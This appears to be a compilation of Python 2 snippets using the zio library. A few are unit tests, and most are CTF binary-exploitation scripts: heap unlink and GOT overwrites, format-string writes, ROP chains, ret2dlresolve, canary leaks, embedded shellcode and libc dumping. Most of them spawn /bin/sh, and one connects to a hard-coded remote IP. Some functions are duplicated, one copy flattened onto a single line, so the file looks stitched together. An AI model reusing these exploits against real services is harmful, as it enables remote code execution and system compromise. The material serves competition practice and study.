def test_tty_raw_out(self):
s = []
ans = []
for i in range(10):
r = random.randint(0, 1)
s.append('%d%s' % (i, r and '\\r\\n' or '\\n'))
ans.append('%d%s' % (i, r and '\r\n' or '\n'))
ans = ''.join(ans)
cmd = "printf '" + ''.join(s) + "'"
io = zio(cmd, stdout=TTY_RAW)
rd = io.read()
io.close()
self.assertEqual(rd, ans)
unprintable = [
chr(c) for c in range(256) if chr(c) not in string.printable
]
for i in range(10):
random.shuffle(unprintable)
from zio import which
py = which('python2') or which('python')
self.assertNotEqual(py, None)
io = zio(' '.join([
py, '-u',
os.path.join(os.path.dirname(sys.argv[0]), 'myprintf.py'),
"'\\r\\n" + repr(''.join(unprintable))[1:-1] + "\\n'"
]),
stdout=TTY_RAW,
print_read=COLORED(REPR))
rd = io.read()
self.assertEqual(rd, "\r\n" + ''.join(unprintable) + "\n")
def cmdline(self, cmd, **kwargs):
print ''
socat_exec = ',pty,stderr,ctty'
if 'socat_exec' in kwargs:
socat_exec = kwargs['socat_exec']
del kwargs['socat_exec']
io = zio(cmd, **kwargs)
yield io
io.close()
print '"%s" exited: ' % cmd, io.exit_code
for _ in range(16):
port = random.randint(31337, 65530)
p = subprocess.Popen([
'socat',
'TCP-LISTEN:%d' % port, 'exec:"' + cmd + '"' + socat_exec
])
time.sleep(0.2)
if p.returncode:
continue
try:
io = zio(('127.0.0.1', port), **kwargs)
yield io
except socket.error:
continue
io.close()
p.terminate()
p.wait()
break
def cmdline(self, cmd, **kwargs):
print ''
socat_exec = ',pty,stderr,ctty'
if 'socat_exec' in kwargs:
socat_exec = kwargs['socat_exec']
del kwargs['socat_exec']
io = zio(cmd, **kwargs)
yield io
io.close()
print '"%s" exited: ' % cmd, io.exit_code
for _ in range(16):
port = random.randint(31337, 65530)
p = subprocess.Popen(['socat', 'TCP-LISTEN:%d' % port, 'exec:"' + cmd + '"' + socat_exec])
time.sleep(0.2)
if p.returncode:
continue
try:
io = zio(('127.0.0.1', port), **kwargs)
yield io
except socket.error:
continue
io.close()
p.terminate()
p.wait()
break
def mk(target, debug=True):
if debug:
return zio(target,
print_read=COLORED(REPR, 'red'),
print_write=COLORED(REPR, 'yellow'),
timeout=10000)
else:
return zio(target, print_read=False, print_write=False, timeout=10000)
def test_tty(self):
print ''
io = zio('tty')
out = io.read()
self.assertEqual(out.strip(), 'not a tty', repr(out))
io = zio('tty', stdin = TTY)
out = io.read()
self.assertTrue(out.strip().startswith('/dev/'), repr(out))
def test_tty(self):
print ''
io = zio('tty')
out = io.read()
self.assertEqual(out.strip(), 'not a tty', repr(out))
io = zio('tty', stdin=TTY)
out = io.read()
self.assertTrue(out.strip().startswith('/dev/'), repr(out))
def exp(target):
#io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green'))
io = zio(target,
timeout=10000,
print_read=COLORED(RAW, 'red'),
print_write=COLORED(RAW, 'green'))
new_sc(io, 'a' * 0x80) #0x603010
new_sc(io, 'b' * 0x80) #0x6030c0
new_sc(io, '/bin/sh;' + 'c' * 0x78) #0x603170
ptr_addr = 0x00000000006016d0
# rax rdx
payload = l64(0) + l64(0x81) + l64(ptr_addr - 0x18) + l64(
ptr_addr - 0x10) + 'a' * 0x60 + l64(0x80) + l64(0x90)
edit_sc(io, 0, payload) # change *0x6016d0 = 0x6016b8
delete_sc(io, 1)
free_got = 0x0000000000601600
payload2 = l64(0) + l64(1) + l64(0x80) + l64(free_got)
edit_sc(io, 0, payload2)
free_addr = list_sc(io)
print hex(free_addr)
#local
system_addr = 0x00007FFFF7A5B640
system_addr = 0x0000000000044C40 + free_addr - 0x0000000000082DA0
'''
libc_base = free_addr - 0x0000000000082DF0
system_addr = libc_base + 0x0000000000046640
'''
edit_sc(io, 0, l64(system_addr))
delete_sc(io, 2)
io.interact()
def exp(target):
io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
print_write=COLORED(RAW, 'green'))
add_function(io, 'fun1', 'para1', 'data1')
add_function(io, 'fun2', 'para2', 'data2')
enter_edit(io, 2)
edit_comments(io, 100, 'comment')
add_read_write(io, 'a' * 80, 'b' * 80)
heap_ptr = 0x6036f0
payload = 'a' * 0x60 + l64(0) + l64(0) + l64(0) + l64(0x51) + l64(
heap_ptr - 0x18) + l64(heap_ptr - 0x10)
payload += 'a' * 0x30 + l64(0x50) + l64(0xa0)
enter_edit(io, 1)
edit_comments(
io, 200,
'a' * 0x30 + l64(0) + l64(0x31) + 'a' * 0x20 + l64(0) + l64(0x21))
enter_edit(io, 2)
edit_comments(io, -1, payload)
add_read_write(io, '', 'b' * 99)
#g_readall :0x0000000000604460
#g_writeall: 0x0000000000604400
#g_ptr: 0x0000000000604050
#comment: 0x0000000000604390
#0x00000000006044c0
interact(io)
def exp(target):
io = zio('./fsb', print_read = False, print_write = False)
io.read_until('(1)')
io.writeline('%2217$x')
leak = 0
try :
io.read_line()
leak = int(io.read_until('\n')[0:-1], 16)
except :
pass
print hex(leak)
if leak != 0x804a060:
io.close()
return
else :
print '\n[+] find address of key'
io.read_until('(2)')
io.writeline('%2217$lln')
io.read_until('(3)')
io.writeline('0')
io.read_until('(4)')
io.writeline('0')
io.read_until('key :')
io.writeline('0')
print '[+] your shell !'
io.interact()
io.close()
exit()
def get_io(target):
ELF(target)
io = zio(target,
timeout=9999,
print_read=COLORED(RAW, "green"),
print_write=COLORED(RAW, "blue"))
return io
def exp(target):
io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
print_write=COLORED(RAW, 'green'))
io.gdb_hint()
io.read_until('Bucko')
count_dict = {}
for i in range(0xd1):
count = 16000 / 0xd1
if i < 16000 % 0xd1:
count += 1
count_dict[i] = count
system_plt = 0x0000000000400FD0
pop_rdi_ret = 0x0000000000402703
sh = 0x4008ca
payload = l32(8001) + l32(0x20) + 'a' * 8
payload += l64(pop_rdi_ret) + l64(sh) + l64(system_plt)
for c in payload:
count_dict[ord(c)] -= 1
d = ''
for i in range(0xd1):
d += chr(i) * count_dict[i]
d = d[0:0x18] + payload + d[0x18:]
io.gdb_hint()
io.writeline(d)
interact(io)
def exp(target):
io = zio(target, timeout=10000, print_read=False, print_write=False)
mem = create_note(io)
while mem[1] > 0xf0000000:
delete_note(io, mem[0])
mem = create_note(io)
print hex(mem[1])
write_note(io, mem[0], shellcode.rjust(0x100, '\x90'))
# stack grow
for i in range(0, 0x1000):
secret(io, 'A' * 0x400)
print i
mem1 = create_note(io)
while (mem1[1] < 0xffd60000) or (mem[1] > 0xffffd000):
delete_note(io, mem1[0])
mem1 = create_note(io)
note = read_note(io, mem1[0])
print "[-] memory address: " + hex(mem1[1])
print "[-] note: " + note.encode('hex') + '\n'
if (mem1[1] >= 0xf7ffc000) and (mem1[1] < 0xffd60000):
if note != '\x0a':
break
payload = l32(mem[1]) * (0x1000 / 4 - 1)
print '\n-------------find it-------------------'
print '[+] write to : ' + hex(mem1[1])
print '[+] with payload : ' + payload.encode('hex')
write_note(io, mem1[0], payload)
exit_ret(io)
io.interact()
io.close()
def exp(target):
io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
print_write=COLORED(RAW, 'green'))
add_function(io, 'fun1', 'para1', 'data1')
add_function(io, 'fun2', 'para2', 'data2')
enter_edit(io, 2)
atoi_got = 0x603230
edit_comments(io, 666, 'a' * 0x18 + l64(atoi_got))
#fun1 0x604070
#fun2 0x604200 comment:0x604390
delete_function(io, 2)
add_function(io, 'fun3', 'para3', 'data3')
add_function(io, 'fun4', 'para4', 'data4')
add_function(io, 'fun5', 'para5', 'data5')
show_function(io, 3)
io.read_until('#')
atoi = l64(io.readline()[:-1].ljust(8, '\x00'))
print hex(atoi)
base = atoi - 0x0000000000036E80
system = base + 0x0000000000045390
#base = atoi - 0x0000000000033C10
#system = base + 0x000000000003E8B0
enter_edit(io, 3)
edit_comments(io, 8, l64(system)[:-1])
io.read_until('Option')
io.writeline('sh')
interact(io)
def exp(target):
p = 7
q = 37
e = 7
d = egcd(e, (p - 1) * (q - 1))
# print 'p=%d\nq=%d\ne=%d\nd=%d\n' % (p, q, e, d)
# io = zio(target, timeout = 100000, print_read = COLORED(RAW, 'red'), print_write = COLORED(RAW, 'yellow'))
io = zio(target, timeout=100000, print_read=False, print_write=False)
set_key(io, p, q, e, d)
plt_system = 0x004007c0
got_printf = 0x00602028
got_putchar = 0x00602000
adr_ret = 0x0040122b
payload = get_cypher(
io,
'%83$n%79$n%064lx%78$hn%82$hn%01920lx%77$hn%02667lx%81$hn;/bin/sh\x00')
payload += l64(got_printf)
payload += l64(got_printf + 2)
payload += l64(got_printf + 4)
payload += l64(got_printf + 6)
payload += l64(got_putchar)
payload += l64(got_putchar + 2)
payload += l64(got_putchar + 4)
payload += l64(got_putchar + 6)
decrypt(io, payload)
io.interact()
def exp(target):
io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
io.gdb_hint()
add_domain(io, '0' * (0x800 - 16 - 8 - 1 - 4 - 3)+'12') #0 0x804c008 0x804c7f0
add_domain(io, '0'*0x770) #1 0x804c878 0x804cff0 top=0x804d070
add_domain(io, '0'*0x1a0) #2
add_domain(io, '/bin/sh'+'0'*0x88) #3 0x0804d340 0x0804d2a8
add_domain(io, '0'*0x10) #4 0x0804d3e0
add_domain(io, '0'*0x5b0) #5
add_domain(io, '0'*0x770) #6
add_domain(io, '0'*0x770) #7
add_domain(io, '0'*0x770) #8
add_domain(io, '0'*0x770) #9
add_domain(io, '/bin/sh;'+'0'*(0x770-8)) #10
remove_domain(io, 1)
lookup_domain(io, 0)
remove_domain(io, 2) # top = 0x804d070 unsort=0x804d218
ptr_addr = 0x0804b0a4
add_domain(io, '0'*0x90) #1 0x0804d220
free_got = 0x0804b004
payload2 = 272*'1' + l32(free_got)
add_domain(io, payload2)
free = list_domain(io)
#local
system = 0xb7e55060
#remote
system = free - 0x781b0 + 0x3d170
edit_domain_name(io, 1, l32(system))
remove_domain(io, 10)
io.interact()
def exp(target): #io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green')) io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green')) new_sc(io, 'a'*0x80) #0x603010 new_sc(io, 'b'*0x80) #0x6030c0 new_sc(io, '/bin/sh;'+'c'*0x78) #0x603170 ptr_addr = 0x00000000006016d0 # rax rdx payload = l64(0) + l64(0x81) + l64(ptr_addr-0x18) + l64(ptr_addr-0x10) + 'a'*0x60 + l64(0x80) + l64(0x90) edit_sc(io, 0, payload) # change *0x6016d0 = 0x6016b8 delete_sc(io, 1) free_got = 0x0000000000601600 payload2 = l64(0) + l64(1) +l64(0x80) + l64(free_got) edit_sc(io, 0, payload2) free_addr = list_sc(io) print hex(free_addr) #local system_addr = 0x00007FFFF7A5B640 system_addr = 0x0000000000044C40 + free_addr - 0x0000000000082DA0 ''' libc_base = free_addr - 0x0000000000082DF0 system_addr = libc_base + 0x0000000000046640 ''' edit_sc(io, 0, l64(system_addr)) delete_sc(io, 2) io.interact()
def exp(target):
# leak info
leak = os.popen('./leak ' +
str(int(time.time()) +
random.randint(-10, 10))).read().split('*')[0:-1]
leak = [int(l) for l in leak]
io = zio(target, print_read=False, print_write=False)
# calc canary
io.read_until('input captcha : ')
captcha = int(io.read_line()[0:-1])
canary = captcha - leak[1] - leak[2] + leak[3] - leak[4] - leak[5] + leak[
6] - leak[7]
print '[+] leak canary : ' + hex(ctypes.c_uint32(canary).value)
io.writeline(str(captcha))
io.read_until('Encode your data with BASE64 then paste me!')
plt_system = 0x8048880
adr_gbuf = 0x804b0e0
payload = 'A' * 0x200
payload += l32(canary)
payload += 'A' * 0xc
payload += l32(plt_system)
payload += l32(0xdeadbeef)
payload += l32(adr_gbuf + 0x2d1)
io.writeline(base64.b64encode(payload) + 'A/bin/sh')
io.interact()
def get_io(target):
ELF("./main")
io = zio(target,
timeout=9999,
print_read=COLORED(RAW, 'green'),
print_write=COLORED(RAW, 'blue'))
return io
def exp(target): io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green')) io.gdb_hint() add_domain(io, '0' * (0x800 - 16 - 8 - 1 - 4 - 3)+'12') #0 0x804c008 0x804c7f0 add_domain(io, '0'*0x770) #1 0x804c878 0x804cff0 top=0x804d070 add_domain(io, '0'*0x1a0) #2 add_domain(io, '/bin/sh'+'0'*0x88) #3 0x0804d340 0x0804d2a8 add_domain(io, '0'*0x10) #4 0x0804d3e0 add_domain(io, '0'*0x5b0) #5 add_domain(io, '0'*0x770) #6 add_domain(io, '0'*0x770) #7 add_domain(io, '0'*0x770) #8 add_domain(io, '0'*0x770) #9 add_domain(io, '/bin/sh;'+'0'*(0x770-8)) #10 remove_domain(io, 1) lookup_domain(io, 0) remove_domain(io, 2) # top = 0x804d070 unsort=0x804d218 ptr_addr = 0x0804b0a4 add_domain(io, '0'*0x90) #1 0x0804d220 free_got = 0x0804b004 payload2 = 272*'1' + l32(free_got) add_domain(io, payload2) free = list_domain(io) #local system = 0xb7e55060 #remote #system = free - 0x781b0 + 0x3d170 edit_domain_name(io, 1, l32(system)) remove_domain(io, 10) io.interact()
def get_io(target):
read_mode = COLORED(RAW, "green")
write_mode = COLORED(RAW, "blue")
io = zio(
target,
timeout=9999) #, print_read = read_mode, print_write = write_mode)
return io
def exp(target):
io = zio(target, timeout=30, print_read=COLORED(NONE, 'red'), \
print_write=COLORED(NONE, 'green'))
#io.read_until('Token')
#io.writeline('NxArhGPKLMmen9Y9QPePHSBbFqQPiqnU')
io.read_until('?')
io.writeline('S')
d = int(send_message(io, '%63$p'), 16)
libc_base = d - 0x0000000000020830
print 'libc_base', hex(libc_base)
system = libc_base + 0x0000000000045390
binsh = libc_base + 0x000000000018CD17
pop_rdi_ret = 0x0000000000402723
stack = int(send_message(io, '%46$p'), 16)
print 'stack', hex(stack)
free_got = 0x00000000006040A8
addr = l64(free_got)+l64(free_got+2)+l64(free_got+4)
writes = {}
writes[0] = system & 0xffff
writes[1] = (system>> 16) & 0xffff
writes[2] = (system>> 32) & 0xffff
payload = 'aaa;sh;'
printed = len(payload)
for where, what in sorted(writes.items(), key=operator.itemgetter(1)):
delta = (what - printed) & 0xffff
if delta > 0:
if delta < 8:
payload += 'A' * delta
else:
payload += '%' + str(delta) + 'x'
payload += '%' + str(14 + where) + '$hn'
printed += delta
payload = payload.ljust(48, 'a')
payload += addr
print len(payload)
do_fmt2(io, payload)
payload = '\x03sh;'
io.write(l16(1)+l16(0)+l32(len(payload)+8))
io.write(payload)
io.writeline('echo 123')
io.read_until('123\n')
io.writeline('./bin/cat flag/flag')
flag = io.readline()[:-1].strip()
print target
print 'flag', flag
submit_flag(flag)
io.close()
def exp(target):
io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
print_write=COLORED(RAW, 'green'))
io.read_until(':')
io.writeline(str(92233720368547759))
base, rsp, cookie = show(io, 1)
print 'base', hex(base)
fake_rsp = rsp - 0x48
pop_rdi_ret = base + 0x000000000001523
addr = l64(rol(fake_rsp ^ cookie)) + l64(rol(pop_rdi_ret ^ cookie))
print HEX(addr)
edit(io, 1, 0, "", addr, "")
io.read_until('>>')
payload = '5;' + 'a' * 6
puts_got = 0x0000000000202018 + base
puts_plt = 0x9a0 + base
main = base + 0x00000000000013ff
payload += l64(puts_got) + l64(puts_plt) + l64(main)
io.writeline(payload)
puts_addr = l64(io.readline()[:-1].ljust(8, '\x00'))
'''
base = puts_addr - 0x000000000006F5D0
system = base + 0x0000000000045380
print 'system', hex(system)
binsh = base + 0x000000000018C58B
'''
base = puts_addr - 0x000000000006FD60
print 'base', hex(base)
system = base + 0x0000000000046590
binsh = base + 0x000000000017C8C3
#io.gdb_hint()
io.read_until(':')
io.writeline(str(92233720368547759))
fake_rsp = rsp - 0x80
addr = l64(rol(fake_rsp ^ cookie)) + l64(rol(pop_rdi_ret ^ cookie))
print HEX(addr)
io.gdb_hint()
edit(io, 1, 0, "", addr, "")
io.read_until('>>')
payload = '5;' + 'a' * 6
payload += l64(binsh) + l64(system) + l64(main)
io.writeline(payload)
#io.gdb_hint()
interact(io)
def get_io(target):
r_m = COLORED(RAW, "green")
w_m = COLORED(RAW, "blue")
r_m = False
w_m = False
#io = zio(target, timeout = 9999, print_read = r_m, print_write = w_m)
io = zio(target, timeout = 20, print_read = r_m, print_write = w_m, env={"LD_PRELOAD":libc_file_path})
return io
def exp(target):
io = zio(target,
timeout=10000,
print_read=COLORED(RAW, 'red'),
print_write=COLORED(RAW, 'green'))
write_any(io)
io.interact()
def get_io(target):
io = zio(target, timeout = 9999)
io.read_until("input captcha : ")
captcha = io.read_until("\n")
io.write(captcha)
io.read_until("then paste me!\n")
return io, captcha
def exp(target):
io = zio(target,
timeout=10000,
print_read=COLORED(RAW, 'red'),
print_write=COLORED(RAW, 'green'))
pop_rdi_ret = 0x0000000000400603
pop_rsi_r15_ret = 0x0000000000400601
leak_addr = 0x600ef0
write_plt = 0x0000000000400430
pop_rbp_ret = 0x4004d0
leak_rop = l64(pop_rsi_r15_ret) + l64(leak_addr) + l64(0) + l64(
pop_rdi_ret) + l64(1) + l64(write_plt)
leak_rop += l64(pop_rbp_ret) + l64(0x601f00) + l64(0x400582)
for i in range(0, len(leak_rop), 8):
write_16byte(io, 0x601b00 + i, leak_rop[i:i + 8] + '\x00' * 8)
leave_ret = 0x40059d
leak_stack_povit = 'a' * 0x10 + l64(0x601b00 - 0x8) + l64(leave_ret)
io.write(leak_stack_povit)
io.read_until(':')
link_map_addr = l64(io.read(8)) + 0x28
print hex(link_map_addr)
r_offset = 0x601970 # a writable addr
r_sym = 0x155e8
fake_relro = generate_fake_relro(r_offset, r_sym).ljust(0x20, '\x00')
st_name = 0x200d68
fake_sym = generate_fake_sym(st_name).ljust(0x20, '\x00')
write_16byte(io, link_map_addr + 0x1c8, '\x00' * 0x10)
#write_16byte(io, 0x600858, l64(0x6ffffff0)+l64(0x3d57d6))
for i in range(0, len(fake_relro), 8):
write_16byte(io, 0x601058 + i, fake_relro[i:i + 8] + '\x00' * 8)
for i in range(0, len(fake_sym), 8):
write_16byte(io, 0x601078 + i, fake_sym[i:i + 8] + '\x00' * 8)
write_16byte(io, 0x601098, 'system'.ljust(16, '\x00'))
write_16byte(io, 0x601a50, '/bin/sh'.ljust(16, '\x00'))
plt0 = 0x400420
rop = l64(pop_rdi_ret) + l64(0x601a50)
index = 0x155dc
rop += l64(plt0) + l64(index)
for i in range(0, len(rop), 8):
write_16byte(io, 0x601980 + i, rop[i:i + 8] + '\x00' * 8)
stack_povit = 'a' * 0x10 + l64(0x601980 - 0x8) + l64(leave_ret)
io.write(stack_povit)
interact(io)
def exp(target):
io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
sh= 0x804828e
system = 0x080483E0
write_dword(io, 0x2c, system)
write_dword(io, 0x2c+8, sh)
write_byte(io, 1, 1)
write_byte(io, 1, 1)
io.interact()
def exp(s):
io = zio('./tlc')
io.read_until(':')
io.writeline(s)
try:
io.read_until(':')
data = io.readline()
io.close()
except:
pass
def attack(host='127.0.0.1', port=1234, shell=False):
if host == local:
debug = 1
io = zio(local, print_read=COLORED(REPR,'yellow'),\
print_write=COLORED(REPR,'blue'))
else:
debug = 0
io = zio((host, port), print_read=False, print_write=False)
start(io, debug)
if shell:
return io
else:
flag = ''
io.write(cmd+'\n')
flag = io.readline().strip()
io.close()
return flag
def exp(target):
io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), \
print_write=COLORED(RAW, 'green'))
login(io)
add_req(io, '11111111')
add_req(io, '22222222')
add_req(io, '33333333')
add_req(io, '44444444')
add_req(io, '55555555')
add_req(io, '66666666')
add_req(io, '77777777')
del_req(io, 1)
del_req(io, 3)
del_req(io, 5)
#leak
change_req(io, 0, 'a'*0x47)
print_req(io)
io.read_until('a'*0x47+'\n')
leak_value = l64(io.readline()[:-1].ljust(8, '\x00'))
print hex(leak_value)
heap_base = leak_value - 0xe0
atoi_got = 0x00000000006099D8
payload = l64(atoi_got-0x18)*8
change_req(io, 0, payload + l64(0x0000000000609E80)+l64(0x0000000000609E80))
change_req(io, 2, 'b'*0x40 + l64(0x0000000000609E80)+l64(0x0000000000609E80))
change_req(io, 4, 'c'*0x40 + l64(0x0000000000609E80)+l64(0x0000000000609E80))
buf = ""
buf += "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xaa\xfb\x07\x50\x07\x4b\x98"
buf += "\xc5\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\xc0\xc0\x5f\xc9\x4f\xf0\xb7\xa7\xc3\x95\x28\x23\x6f"
buf += "\x4b\xcb\x8d\x23\x1c\x6f\x7d\x64\x4b\x98\x8d\x23\x1d"
buf += "\x55\xb8\x0f\x4b\x98\xc5\x85\x99\x6e\x3e\x28\x38\xf0"
buf += "\xc5\xfc\xac\x4f\xd9\xe1\x44\x9d\xc5"
change_req(io, 6, buf)
#change_req(io, 2, 'b'*0x50)
#io.gdb_hint()
sc_addr = 0x6161616161616161
# shellcode64
add_req(io, '88888')
payload2 = '\x68'+l64(heap_base+0x1b0)+'\xc3'
payload2 = payload2.ljust(0x10, 'a')
change_req(io, 3, payload2+l64(heap_base+0x30)+l64(heap_base+0x60))
add_req(io, '99999')
menu(io, 1)
interact(io)
def connect():
io = zio(('119.254.101.232', 8888))
regex = re.compile('SHA\((.*?)\) = ([\d\w]+)')
_reg, _hash = regex.findall(io.read_until('\n'))[0]
for candidate in exrex.generate(_reg):
shasum = sha1(candidate).hexdigest()
if shasum == _hash:
io.write(candidate + '\n')
break
io.read_until('your answer\n')
return io
def exp(target):
io = zio(target,
timeout=10000,
print_read=COLORED(RAW, 'red'),
print_write=COLORED(RAW, 'green'))
add_tv(io, 'aaa', 100, 200, 'bbbb') #0x602010
add_tv(io, 'aaa', 100, 200, 'bbbb') #0x6020f0
add_tv(io, 'aaa', 100, 200, 'bbbb') #0x6021d0
remove_entry(io, 'aaa')
malloc_got = 0x0000000000601C58
db_addr = 0x601dc0
movie_vt = 0x00000000004015b0
payload = l64(movie_vt) + 'a' * 8 + '\x00' * 56 + 'b' * 8 + '\x00' * (
0x80 - 8) + l64(0x0000006443480000) + l64(malloc_got)
print len(payload)
add_movie(io, 'ccc', payload, 300, 'eeee') #0x602010 0x602110
add_tv(io, 'hhh', 100, 200, 'bbbb') #0x6021e0
add_tv(io, 'hhh', 100, 200, 'bbbb') #0x6022c0
add_tv(io, 'hhh', 100, 200, 'bbbb') #0x6023a0
remove_entry(io, 'hhh')
payload = l64(movie_vt) + 'a' * 8 + '\x00' * 56 + 'b' * 8 + '\x00' * (
0x80 - 8) + l64(0x0000006443480000) + l64(db_addr)
add_movie(io, 'ccc', payload, 300, 'eeee')
malloc_addr, heap_addr = show_all(io)
io.gdb_hint()
add_tv(io, 'jjj', 100, 200, 'bbbb') #0x6023b0
add_tv(io, 'jjj', 100, 200, 'bbbb') #0x602490
add_tv(io, 'jjj', 100, 200, 'bbbb') #0x602570
remove_entry(io, 'jjj')
#local
addr2 = malloc_addr - 0x00007FFFF7277750 + 0x00007FFFF723B52C
#remote
#addr2 = malloc_addr - 0x0000000000082750 + 0x000000000004652c
fake_vt = 0x6023b0 + 8 - 0x602010 + heap_addr
payload = l64(fake_vt) + '/bin/sh;' + '\x00' * 56 + 'b' * 8 + '\x00' * (
0x80 - 8) + l64(0x0000006443480000) + l64(db_addr)
print len(payload)
add_movie(io, l64(addr2), payload, 300, 'eeee')
io.writeline('4')
io.interact()
def leak_got(offset):
io = zio((host, 1234), print_write = False, print_read = False, timeout = 100000)
rop = 'A' * 8200 + l64(stack_cookie) + l64(saved_rbp)
rop += l64(base + 0xec6) + 'A' * 8 + l64(5) + 'B' * 8 + l64(base + 0x202018) + 'C' * 8 + l64(base + offset) + l64(4)
rop += l64(base + 0xeb0)
io.write(rop)
io.read_until('thanks.\n')
left = io.read(8)
return l64(left + '\x00' * (8 - len(left)))
def pwn (target, dis):
io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
#io = zio(target, timeout=10000, print_read=None, print_write=None)
input_info(io)
dian_cai(io, 'aaa', 1)
read_got = 0x0804b010
atoi_got = 0x0804B038
#puts_got = 0x0804b02c
payload = 'a'*32+l32(atoi_got-4)
dian_cai(io, payload, 2)
atoi_addr = link_heap(io)
#system_addr = 0xf7e39190
#io.gdb_hint()
payload2 = 'a'*32+l32(0x0804B1C0-8)
dian_cai(io, payload2, 3)
sublit(io)
payload = 'a'*4+l32(atoi_got)
offset_read = 0x000da8d0
offset_system = 0x0003e800
offset_puts = 0x000656a0
offset_atoi = 0x0002fbb0
print "dis:",hex(dis), "com:", hex(offset_system - offset_atoi)
#libc_base = atoi_addr - offset_atoi
#system_addr = libc_base + offset_system
#system_addr = libc_base + offset_puts
system_addr = atoi_addr + dis
system_addr = struct.unpack("i", l32(system_addr))[0]
sublit(io)
dian_cai(io, payload, system_addr)
#io.writeline('/bin/cat /home/shaxian/flag')
io.writeline('/bin/sh\n')
io.interact()
#data = io.read(1024)
data = io.read_until_timeout(1)
if "RCTF" in data or "No such file" in data:
print "herre"
file_w = open("flga-4002", 'w')
data += "dis:" + hex(dis) + "com:" + hex(offset_system - offset_atoi)
file_w.write(data)
file_w.close()
exit(0)
else:
io.close()
def test_attach_socket(self):
print('')
for _ in range(4):
port = random.randint(31337, 65530)
p = subprocess.Popen([
'socat',
'TCP-LISTEN:%d,crlf' % port,
'SYSTEM:"echo HTTP/1.0 200; echo Content-Type: text/plain; echo; echo Hello, zio;"'
])
time.sleep(0.2)
if p.returncode:
continue
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
line = b''
while True:
c = s.recv(1)
if not c:
break
else:
line += c
if line.find(b'\n') > -1:
break
assert line.rstrip() == b"HTTP/1.0 200", repr(line)
io = zio(s)
line = io.readline()
self.assertEqual(line.rstrip(), b"Content-Type: text/plain",
repr(line))
line = io.readline()
line = io.readline()
self.assertEqual(line.rstrip(), b"Hello, zio", repr(line))
io.end()
io.close()
except socket.error:
continue
p.terminate()
for _ in range(10):
r = p.poll()
if r is not None:
break
time.sleep(0.2)
else:
try:
p.kill()
except: # NOQA
pass
break
def exp(target):
io = zio(target,
timeout=10000,
print_read=COLORED(RAW, 'red'),
print_write=COLORED(RAW, 'green'))
sh = 0x804828e
system = 0x080483E0
write_dword(io, 0x2c, system)
write_dword(io, 0x2c + 8, sh)
write_byte(io, 1, 1)
write_byte(io, 1, 1)
io.interact()
def dump_libc(write_addr, size):
io = zio((host, 1234), print_write = False, print_read = False, timeout = 100000)
rop = l64(write_addr) + 'A' * (8200 - 8) + l64(stack_cookie) + l64(saved_rbp)
rop += l64(base + 0xec6) + 'A' * 8 + l64(0) + 'B' * 8 + l64(saved_rbp - 0x70 - 0x2000) + l64(size) + l64(libc_base) + l64(4)
rop += l64(base + 0xeb0)
io.write(rop)
io.read_until('thanks.\n')
left = io.read()
io.close()
return left
def exp(target):
io = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))
store_name='name'*15+'xxx'
item_name='a'*31
description='b'*79
create_store(io,store_name,item_name,description)
length=len('Blackberry OS Phone Z price: -2147483648 CNY description: ')
generate(io)
for x in xrange(15):
if x == 0:
item_name=payload+'a'*(31-len(payload))
description = payload+'Z'*(79-len(payload))
if x == 14:
description=payload+'Z'*(74-len(payload))+l32(0x08049b74)+'Z'
add_item(io,item_name,description)
generate(io)
#改got表
io.read_until('? ')
io.writeline('b')
io.read_until('? ')
io.writeline('2')
io.read_until('? ')
io.writeline('b')
io.read_until('? ')
io.gdb_hint()
io.writeline(str(addr_blackberry-length))
io.read_until('? ')
io.writeline('b')
io.read_until("? ")
io.writeline(str(got_stack_fail))
#栈溢出
io.read_until('? ')
io.writeline('c')
io.read_until('? ')
io.writeline('a')
payload2='d'*32+l32(addr_puts)+l32(addr_store_cmd)+l32(got_atoi)
io.read_until('? ')
io.writeline(payload2)
io.read_until('Long.\n')
data=io.read(4)
print 'data:%s'%data
io.read_until('? ')
real_atoi=l32(data)
print hex(real_atoi)
#bin/sh
real_system=real_atoi-offset_atoi+offset_system
real_bin=real_atoi-offset_atoi+offset_bin
payload3='d'*32+l32(real_system)+'1234'+l32(real_bin)
io.writeline(payload3)
io.read_until('Long.\n')
io.interact()
def exp3(target):
io = zio(target, timeout=30, print_read=COLORED(RAW, 'red'), \
print_write=COLORED(RAW, 'green'))
payload = 'hri\x01\x01\x814$\x01\x01\x01\x011\xd2Rj\x08ZH\x01\xe2RH\x89\xe2jhH\xb8/bin///sPj;XH\x89\xe7H\x89\xd6\x99\x0f\x05'
add(io, 0x3eeb, 1, payload)
index = (0x2030a0 - 0x203020) / 8
payload = l32(0xdeadfafa) + l8(index)
io.write(payload)
io.writeline('./bin/cat flag/flag')
flag = io.readline()[:-1].strip()
print target
print 'flag', flag
submit_flag(flag)
io.close()
def a_byte(num):
global payload
address = 0
while address <= 255:
io = zio((ip, 1234), timeout = 100000, print_read = REPR, print_write = COLORED(REPR))
io.write(payload + chr(address) )
io.read_until('thanks.')
io.readline()
data = io.readline()
if data != '':
payload += chr(address)
result = my_hex(address)
#log("address_"+ str(num) + ": " + result, 'red')
return result
address += 1
def exp(target):
io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green'))
add_item(io, '123', '111')
add_item(io, '124', '112')
buf_addr = 0x6016c0 # point to the address of buffer
